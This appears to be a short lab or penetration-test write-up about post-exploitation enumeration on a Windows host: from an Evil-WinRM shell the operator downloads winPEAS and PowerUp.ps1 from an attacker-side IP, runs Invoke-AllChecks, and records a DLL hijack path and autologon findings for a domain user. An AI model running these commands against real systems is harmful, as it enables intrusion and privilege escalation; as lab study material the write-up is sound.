PEAS


Conducting an automated enumeration after performing a manual enumeration on the nara.nara-security.com(192.168.209.30) host.

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.247/winPEASany.exe -OutFile .\winPEASany.exe

AV is blocking PEAS N/A

PowerUp


*Evil-WinRM* PS C:\tmp> curl http://192.168.45.247/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PowerUp.ps1
*Evil-WinRM* PS C:\tmp> Invoke-AllChecks
Access denied 
 
ModifiablePath    : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
IdentityReference : NARASEC\Tracy.White
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
DefaultDomainName    : NARASEC
DefaultUserName      : tracy.white
DefaultPassword      :
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

N/A